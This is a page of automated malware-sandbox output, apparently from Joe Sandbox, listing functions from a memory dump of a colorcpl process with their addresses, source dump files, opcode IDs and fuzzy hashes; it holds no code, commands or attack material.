Function 04375654 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
Instruction ID: 3f5aa9265ca004c9a54488302876afe47eddc43c351325370318df5447e2c242
Opcode Fuzzy Hash: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
Instruction Fuzzy Hash: C6F0FF73A01214BFE329CF5CC880F5AB7ECEB45650F054069E900DB270E771EE04CA94

Uniqueness

Uniqueness Score: -1.00%

Function 044150B7 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4053836e36d7a8f0b3a2ea2585ce29848a8945cf6a11b113f18b40880924c9ff
Instruction ID: af4779e9ce8de344d89a96f5f6e6268fe5b08abc20f3619c88e9f499197a0fc9
Opcode Fuzzy Hash: 4053836e36d7a8f0b3a2ea2585ce29848a8945cf6a11b113f18b40880924c9ff
Instruction Fuzzy Hash: E211CC70A00259DFDB04DFA9D541B9EF7F4BF48704F1441AAE515EB782E634E941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 043CD4A0 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 874b1ce079142d2cf1fcd32d50316df6ee0ec614a544cebd76f0cd87bb74d766
Instruction ID: 9befd6df62cef6dd978114570ef5e72293705f651a74699a7b23b92d42b8cde5
Opcode Fuzzy Hash: 874b1ce079142d2cf1fcd32d50316df6ee0ec614a544cebd76f0cd87bb74d766
Instruction Fuzzy Hash: 3BF0C232280A8067FE3177A08D54F2A3619EF84F9DF691069BB021B5A0CB28FC01CF90

Uniqueness

Uniqueness Score: -1.00%

Function 043FF409 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80a6dfd5c2d74321441ee390dcf59e2d8904e2d1e2b898a6f905c3638b1bd347
Instruction ID: 580689ae64bc8cb08864240ea48471b0e944a8b8717d34bb73cc2030951afca7
Opcode Fuzzy Hash: 80a6dfd5c2d74321441ee390dcf59e2d8904e2d1e2b898a6f905c3638b1bd347
Instruction Fuzzy Hash: E4F0A431A00358ABE704EBB9C805AAEB7B8EF44714F00809AF911EB280EA74E9018750

Uniqueness

Uniqueness Score: -1.00%

Function 043C6040 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0dd29ffe6cddaff40cdda75bcb1669297d52e5307dee62bf9dea0ffac2072810
Instruction ID: e31a967d9e55a94864e8eadb333304ea43b3298babbcd42901071af2d6443c25
Opcode Fuzzy Hash: 0dd29ffe6cddaff40cdda75bcb1669297d52e5307dee62bf9dea0ffac2072810
Instruction Fuzzy Hash: 57F01D7220001DBFEF119F94DD81DAF7BBEEF49298B104129BA1196160D635EE21ABA0

Uniqueness

Uniqueness Score: -1.00%

Function 043CA130 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24a707ac294323ecfa482df0ab7b62fd80a04224a9c8d863e25c8191e66615fa
Instruction ID: 6e1db363e1afeac3747a22a32743b63e36d6b89397d488480d88ed8cf602bc24
Opcode Fuzzy Hash: 24a707ac294323ecfa482df0ab7b62fd80a04224a9c8d863e25c8191e66615fa
Instruction Fuzzy Hash: 0A01973611114DABDF12AF84EC40EDA3F66FB4C754F068105FE2866220C636ED70EB80

Uniqueness

Uniqueness Score: -1.00%

Function 0437716D Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9094b8c0e0c6258773a4d94f691f5c07bcccd706a453715036b0034c324f6df
Instruction ID: 21e90ac2cd9c03df2e7502e25fb41f68ff2211d678f32836a4b5f05fbce79ebd
Opcode Fuzzy Hash: d9094b8c0e0c6258773a4d94f691f5c07bcccd706a453715036b0034c324f6df
Instruction Fuzzy Hash: EDF04672B012546FEB30DBA48801FABBBE99F80790F0494B69D5197280D738FA4087A0

Uniqueness

Uniqueness Score: -1.00%

Function 0437648A Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c5aac0727d3fc2b02e257e788b608164504f2de183987f168ec2e22231eabbf
Instruction ID: b4058b1a987d00065e9f456cf0d38b05f207977d9ac47bb3cf7c02091ac2ddae
Opcode Fuzzy Hash: 6c5aac0727d3fc2b02e257e788b608164504f2de183987f168ec2e22231eabbf
Instruction Fuzzy Hash: 98018670784A809BF7369B28DD5AB2533A8AF50B64F145094AE918BAD2D72CF8008514

Uniqueness

Uniqueness Score: -1.00%

Function 0433C090 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc670423d6d2735a2fd6a75bbbbe20705777df8f4eaeb852a00e721a451fd21b
Instruction ID: 153f4350e484964e9e5adb767452d8b156ef19fc0c8567fb4bc7378be6d57dab
Opcode Fuzzy Hash: fc670423d6d2735a2fd6a75bbbbe20705777df8f4eaeb852a00e721a451fd21b
Instruction Fuzzy Hash: 69F0F6333442805BF71497458D51B63768ADBC0716F25B06AEA05AB591EA71FC418254

Uniqueness

Uniqueness Score: -1.00%

Function 043CE4F2 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d61a3bfed072bebc3533729a18c2e1d60e765f99e10e027ec57f31171bb3125
Instruction ID: b259c9913a1512117f79060176d90d65afb7a40421b5e4640e02d423a3b8f9c9
Opcode Fuzzy Hash: 2d61a3bfed072bebc3533729a18c2e1d60e765f99e10e027ec57f31171bb3125
Instruction Fuzzy Hash: 4DF08233301A129BD7319A4DDC81F12B3B8AF85B60F29246DAA049B660D760FC01CF90

Uniqueness

Uniqueness Score: -1.00%

Function 043CC51D Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82d0e48ce6ff2bb07e559a4b175c897c30393bb08e82cc9d5cd5e13abc3a6085
Instruction ID: 25ed9e3cd1cbd3e45c69282a9866d4744f95847ed9c4a859c109da208b4c88cf
Opcode Fuzzy Hash: 82d0e48ce6ff2bb07e559a4b175c897c30393bb08e82cc9d5cd5e13abc3a6085
Instruction Fuzzy Hash: A6F0AF702057449FD314EF29C842A1BB7E4EF88B04F405A5EBCA8DB391EA34F900CB96

Uniqueness

Uniqueness Score: -1.00%

Function 04370774 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b7835e4d6d6559359274cfa51e41153a2ed1920ea28c928af81b6d046f1638e
Instruction ID: 56a6a6dc6733f3f54c0fbdc66cba1ec6f51e4b2d696413c7a2aeaf7eecb5a8ab
Opcode Fuzzy Hash: 1b7835e4d6d6559359274cfa51e41153a2ed1920ea28c928af81b6d046f1638e
Instruction Fuzzy Hash: 3AF09A72610204AEE328DB21CC05B96B3FDEF98714F2480689845D72A0FAB5FE00DA14

Uniqueness

Uniqueness Score: -1.00%

Function 04415149 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 737eb4ea601d8fd09c4023804b4d6ea507ff24a765db9d39f619e081759a68fb
Instruction ID: 41c599a858890bb47885bf8925e0b4359a2953a261a5f111827b95c38df67d88
Opcode Fuzzy Hash: 737eb4ea601d8fd09c4023804b4d6ea507ff24a765db9d39f619e081759a68fb
Instruction Fuzzy Hash: 6CF04F74E00248EFDB04EFA8D945B9EB7F4EF48704F10445AB915EB391E674EA00CB54

Uniqueness

Uniqueness Score: -1.00%

Function 043CC592 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d51bd51f3622b8237f94cb631134a5833e63e1299505764b45161641cfd5887
Instruction ID: bd3464f4003e8861cb87dd471e82712ff35a91e4364341d649cafa9f3edb647f
Opcode Fuzzy Hash: 5d51bd51f3622b8237f94cb631134a5833e63e1299505764b45161641cfd5887
Instruction Fuzzy Hash: EDF04F70A01348DFDB04EF69C515A5EB7B4EF58704F009059B815EB385EA38FA01CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0434471B Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c83d744cb66ea4d9195fa385818519fd126fbbf29690d5d2976ceda3e9bc5bef
Instruction ID: 3f8a0ad4a7819a0368bdfdaf7bb0321dc51dfce97bf6a9e89c7eb1b69ad53c2f
Opcode Fuzzy Hash: c83d744cb66ea4d9195fa385818519fd126fbbf29690d5d2976ceda3e9bc5bef
Instruction Fuzzy Hash: 58F024719016A48EEB71C724C104BE1BFC89BA3374F087876C4398BD22C330F886C251

Uniqueness

Uniqueness Score: -1.00%

Function 04382539 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ed3d22eeff636eb0551a0025a211ec4f1b1c67496731614af6a82ea339e5be1
Instruction ID: 619ade087c86dfc14f3a74f39df514aa6728b5210e33c395ab63b147d0a01abf
Opcode Fuzzy Hash: 2ed3d22eeff636eb0551a0025a211ec4f1b1c67496731614af6a82ea339e5be1
Instruction Fuzzy Hash: 76E09272340A402BE711AE599CD4F57B7AE9FC2714F04047DB9045E192CAE2AD0986A0

Uniqueness

Uniqueness Score: -1.00%

Function 0437C50D Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa9cee7500fc402644244a3f3003058f77c5b4b382265597a9805f1a6ec62031
Instruction ID: 09dfb9651333cae5ba3046f6a779de1d2f4d2cddd4c6ac894a9367bfa8cd1f87
Opcode Fuzzy Hash: fa9cee7500fc402644244a3f3003058f77c5b4b382265597a9805f1a6ec62031
Instruction Fuzzy Hash: EAF0E2B15116909BDB32975ED048B6277D89B09778F09B165D88687922C729F880CA85

Uniqueness

Uniqueness Score: -1.00%

Function 043CB5D3 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1075dac146392a14f3db52c8c986180df7b15f0e574ef2c54f0947a9a4f506e7
Instruction ID: aca6e9c0fc21a72d2f94b2a659bb3b7303b3bf54b3f55779fc1ef47c288bce37
Opcode Fuzzy Hash: 1075dac146392a14f3db52c8c986180df7b15f0e574ef2c54f0947a9a4f506e7
Instruction Fuzzy Hash: ABF06572A01254BBEB30DA89DD06F9AF6ACDB81B75F1511B9A501E71C0C6B4AE00CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 043C9603 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b3237f76a9f7f54e1d344bed59f542320469b814e181436ab4263643739fa7b
Instruction ID: d1ae3f57d4d6c5878174b0aa0191ea6e016973d5956fdcbb8ed15c18ba76ceed
Opcode Fuzzy Hash: 9b3237f76a9f7f54e1d344bed59f542320469b814e181436ab4263643739fa7b
Instruction Fuzzy Hash: 73E065B2714204ABEF04DF58E845B5A73ECEB8875DF15109DF50AD7180D6B4ED00D750

Uniqueness

Uniqueness Score: -1.00%

Function 043FF717 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b465dc8aa394b722551fac060025428232fc60f52479b878e1f01dab26bf901
Instruction ID: 60a4e8cb116ce3c136236aedfc505329085dd5db123d6c3feeda4fa231d68fe1
Opcode Fuzzy Hash: 9b465dc8aa394b722551fac060025428232fc60f52479b878e1f01dab26bf901
Instruction Fuzzy Hash: 7FF08970A00644DBDB04DBA5D945F5EB7F8DF04708F041099EA01EB281E974E904C754

Uniqueness

Uniqueness Score: -1.00%

Function 043FF7CF Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b60f4bdc60105a1dfff388c78eaabdb5c0806af535cd899a0797456c97b1b5e9
Instruction ID: 9e953d2acec95721662fee4087c6f954ab8d54a1623c822269df9921a1250e84
Opcode Fuzzy Hash: b60f4bdc60105a1dfff388c78eaabdb5c0806af535cd899a0797456c97b1b5e9
Instruction Fuzzy Hash: 18F01271B01748EBDB04EBA9D956E9EB7F8EF48708F441099EA02EB291E974E900C754

Uniqueness

Uniqueness Score: -1.00%

Function 0441505B Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e53746fdb3ee948ba552f57d8c55564c3e06979fac4a6ce14baa17d57411bb2
Instruction ID: 555735f61bba8d2e778fad5d3e065a0dc9e1fbfe3670f463dd7e12104110a9b9
Opcode Fuzzy Hash: 4e53746fdb3ee948ba552f57d8c55564c3e06979fac4a6ce14baa17d57411bb2
Instruction Fuzzy Hash: 3EF08970600248ABDB04EBB5D555F9EB7F4EF44708F101499A501EB291E974E900C754

Uniqueness

Uniqueness Score: -1.00%

Function 04377128 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b0c756f869ad48b26ebad303445db039ded59a4e1b70b9d8c3087846bbf227d
Instruction ID: 3b4942328a75f083e23f99314a2ae81166a0923443e9e1636613c535192ac012
Opcode Fuzzy Hash: 5b0c756f869ad48b26ebad303445db039ded59a4e1b70b9d8c3087846bbf227d
Instruction Fuzzy Hash: 66F0BE319157508FDF629B25C044BAA73D8AB147A4F0DA061D99C87D13C324F890C2D9

Uniqueness

Uniqueness Score: -1.00%

Function 0437174A Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b6d7d465444fa8376fd868220b8d1adb17161d2481895e622205178ab24cb89
Instruction ID: 82b85928169994f20eb5c4e1b1ee6019202c62b18873b0144530ad00cba2a525
Opcode Fuzzy Hash: 5b6d7d465444fa8376fd868220b8d1adb17161d2481895e622205178ab24cb89
Instruction Fuzzy Hash: F8E092736018216BE3216F18AC00F66B3ADEFE4A51F0A4435F944C7214D628FD01C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 043754E0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 369f009082050829a275a7bbe12d1f068ebee6e8ca6735a7f0af70988af87659
Instruction ID: c6c88efc38ecd7496f11a55fa039360cf192c802402c401e14c7ce4bee892ece
Opcode Fuzzy Hash: 369f009082050829a275a7bbe12d1f068ebee6e8ca6735a7f0af70988af87659
Instruction Fuzzy Hash: D0E0E533240A25BBC3351B1ACC04F22FB58EF40771F148219E998439D0CA64F801CAD0

Uniqueness

Uniqueness Score: -1.00%

Function 04340630 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fb8b229e0179ed1d94183841a0f137a63d66d46d99527f7ccba905b47740c18
Instruction ID: f313a6638f106fa7d720c1ec440096abd9a7dcee028bb06fa949949efe46afb9
Opcode Fuzzy Hash: 7fb8b229e0179ed1d94183841a0f137a63d66d46d99527f7ccba905b47740c18
Instruction Fuzzy Hash: 91F0A9363047409FEB89DF51E040AE57BF8EB963A0B002094ED068B360EB39FC91CB85

Uniqueness

Uniqueness Score: -1.00%

Function 04342500 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f709a22ecc9be8a9e2b64e1edfbaf6ee5daf0c5150eb56416ecd15e492b8831e
Instruction ID: 5344eeddc3a65c912c9f8da5f83de6912748577ee180e1f8f998a5ae7e2dbe83
Opcode Fuzzy Hash: f709a22ecc9be8a9e2b64e1edfbaf6ee5daf0c5150eb56416ecd15e492b8831e
Instruction Fuzzy Hash: 1FE09A32100A44ABE322FB29DC01F9BBBEAEF903A9F114128F516571A0CA34BD10CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 043381EB Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 114db9202c54257abf2526529968dd102c67066819c003b1d4cdd2b3c6882db7
Instruction ID: 34e24bbd129bc8d1f1e419feee3343420fffc148416d6b8ad6b2041b53d67081
Opcode Fuzzy Hash: 114db9202c54257abf2526529968dd102c67066819c003b1d4cdd2b3c6882db7
Instruction Fuzzy Hash: 28E0C231540A14EFEB357F20DC00F52B6E5FF00B25F2026AEF486064A08BB8FC81EA48

Uniqueness

Uniqueness Score: -1.00%

Function 043D5660 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c20ecf225a0dee694208ea341b38e602cd64d75c44577403fba3f7e6e2ef15f7
Instruction ID: 7a6d48052d1e9c591dc429d9a0d774951f797f981413b1945206f21a0d5fb2e1
Opcode Fuzzy Hash: c20ecf225a0dee694208ea341b38e602cd64d75c44577403fba3f7e6e2ef15f7
